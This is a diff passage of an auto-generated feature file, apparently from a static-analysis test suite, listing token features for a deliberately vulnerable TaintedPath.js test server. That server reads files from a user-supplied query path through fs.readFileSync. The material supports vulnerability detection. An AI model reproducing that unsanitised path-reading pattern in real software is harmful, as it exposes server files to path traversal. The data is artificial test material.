autogenerated/TaintedPath/TaintedPath.js:48:7:48:11 | write | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:48:13:48:14 | fs | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:48:13:48:14 | fs | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:48:13:48:14 | fs | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:48:13:48:14 | fs | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:48:13:48:14 | fs | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:48:13:48:27 | fs.readFileSync | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:48:13:48:27 | fs.readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:48:13:48:27 | fs.readFileSync | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:48:13:48:27 | fs.readFileSync | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:48:13:48:27 | fs.readFileSync | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:48:13:48:59 | exceptional return of fs.read ... th, z)) | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:48:13:48:59 | exceptional return of fs.read ... th, z)) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:48:13:48:59 | exceptional return of fs.read ... th, z)) | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:48:13:48:59 | exceptional return of fs.read ... th, z)) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:48:13:48:59 | exceptional return of fs.read ... th, z)) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:48:13:48:59 | fs.read ... th, z)) | CalleeFlexibleAccessPath | res.write | | autogenerated/TaintedPath/TaintedPath.js:48:13:48:59 | fs.read ... th, z)) | InputArgumentIndex | 0 | | autogenerated/TaintedPath/TaintedPath.js:48:13:48:59 | fs.read ... th, z)) | contextFunctionInterfaces | views_local(req, res) | @@ -5014,6 +59704,26 @@ tokenFeatures | autogenerated/TaintedPath/TaintedPath.js:48:13:48:59 | fs.read ... th, z)) | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/TaintedPath.js:48:13:48:59 | fs.read ... th, z)) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:48:13:48:59 | fs.read ... th, z)) | receiverName | res | +| autogenerated/TaintedPath/TaintedPath.js:48:16:48:27 | readFileSync | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:48:16:48:27 | readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:48:16:48:27 | readFileSync | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:48:16:48:27 | readFileSync | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:48:16:48:27 | readFileSync | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:48:29:48:38 | pathModule | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:48:29:48:38 | pathModule | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:48:29:48:38 | pathModule | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:48:29:48:38 | pathModule | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:48:29:48:38 | pathModule | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:48:29:48:43 | pathModule.join | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:48:29:48:43 | pathModule.join | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:48:29:48:43 | pathModule.join | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:48:29:48:43 | pathModule.join | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:48:29:48:43 | pathModule.join | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:48:29:48:58 | exceptional return of pathMod ... ath, z) | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:48:29:48:58 | exceptional return of pathMod ... ath, z) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:48:29:48:58 | exceptional return of pathMod ... ath, z) | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:48:29:48:58 | exceptional return of pathMod ... ath, z) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:48:29:48:58 | exceptional return of pathMod ... ath, z) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:48:29:48:58 | pathMod ... ath, z) | CalleeFlexibleAccessPath | fs.readFileSync | | autogenerated/TaintedPath/TaintedPath.js:48:29:48:58 | pathMod ... ath, z) | InputArgumentIndex | 0 | | autogenerated/TaintedPath/TaintedPath.js:48:29:48:58 | pathMod ... ath, z) | calleeImports | fs | @@ -5023,6 +59733,11 @@ tokenFeatures | autogenerated/TaintedPath/TaintedPath.js:48:29:48:58 | pathMod ... ath, z) | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/TaintedPath.js:48:29:48:58 | pathMod ... ath, z) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:48:29:48:58 | pathMod ... ath, z) | receiverName | fs | +| autogenerated/TaintedPath/TaintedPath.js:48:40:48:43 | join | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:48:40:48:43 | join | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:48:40:48:43 | join | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:48:40:48:43 | join | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:48:40:48:43 | join | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:48:45:48:45 | x | CalleeFlexibleAccessPath | pathModule.join | | autogenerated/TaintedPath/TaintedPath.js:48:45:48:45 | x | InputArgumentIndex | 0 | | autogenerated/TaintedPath/TaintedPath.js:48:45:48:45 | x | calleeImports | path | @@ -5059,6 +59774,46 @@ tokenFeatures | autogenerated/TaintedPath/TaintedPath.js:48:57:48:57 | z | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/TaintedPath.js:48:57:48:57 | z | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:48:57:48:57 | z | receiverName | pathModule | +| autogenerated/TaintedPath/TaintedPath.js:50:3:50:5 | res | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:50:3:50:5 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:50:3:50:5 | res | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:50:3:50:5 | res | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:50:3:50:5 | res | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:50:3:50:11 | res.write | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:50:3:50:11 | res.write | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:50:3:50:11 | res.write | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:50:3:50:11 | res.write | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:50:3:50:11 | res.write | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:50:3:50:56 | exceptional return of res.wri ... path))) | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:50:3:50:56 | exceptional return of res.wri ... path))) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:50:3:50:56 | exceptional return of res.wri ... path))) | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:50:3:50:56 | exceptional return of res.wri ... path))) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:50:3:50:56 | exceptional return of res.wri ... path))) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:50:3:50:56 | res.wri ... path))) | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:50:3:50:56 | res.wri ... path))) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:50:3:50:56 | res.wri ... path))) | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:50:3:50:56 | res.wri ... path))) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:50:3:50:56 | res.wri ... path))) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:50:7:50:11 | write | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:50:7:50:11 | write | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:50:7:50:11 | write | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:50:7:50:11 | write | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:50:7:50:11 | write | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:50:13:50:14 | fs | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:50:13:50:14 | fs | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:50:13:50:14 | fs | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:50:13:50:14 | fs | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:50:13:50:14 | fs | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:50:13:50:27 | fs.readFileSync | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:50:13:50:27 | fs.readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:50:13:50:27 | fs.readFileSync | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:50:13:50:27 | fs.readFileSync | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:50:13:50:27 | fs.readFileSync | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:50:13:50:55 | exceptional return of fs.read ... (path)) | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:50:13:50:55 | exceptional return of fs.read ... (path)) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:50:13:50:55 | exceptional return of fs.read ... (path)) | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:50:13:50:55 | exceptional return of fs.read ... (path)) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:50:13:50:55 | exceptional return of fs.read ... (path)) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:50:13:50:55 | fs.read ... (path)) | CalleeFlexibleAccessPath | res.write | | autogenerated/TaintedPath/TaintedPath.js:50:13:50:55 | fs.read ... (path)) | InputArgumentIndex | 0 | | autogenerated/TaintedPath/TaintedPath.js:50:13:50:55 | fs.read ... (path)) | contextFunctionInterfaces | views_local(req, res) | @@ -5067,6 +59822,26 @@ tokenFeatures | autogenerated/TaintedPath/TaintedPath.js:50:13:50:55 | fs.read ... (path)) | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/TaintedPath.js:50:13:50:55 | fs.read ... (path)) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:50:13:50:55 | fs.read ... (path)) | receiverName | res | +| autogenerated/TaintedPath/TaintedPath.js:50:16:50:27 | readFileSync | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:50:16:50:27 | readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:50:16:50:27 | readFileSync | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:50:16:50:27 | readFileSync | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:50:16:50:27 | readFileSync | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:50:29:50:38 | pathModule | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:50:29:50:38 | pathModule | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:50:29:50:38 | pathModule | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:50:29:50:38 | pathModule | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:50:29:50:38 | pathModule | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:50:29:50:48 | pathModule.normalize | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:50:29:50:48 | pathModule.normalize | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:50:29:50:48 | pathModule.normalize | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| 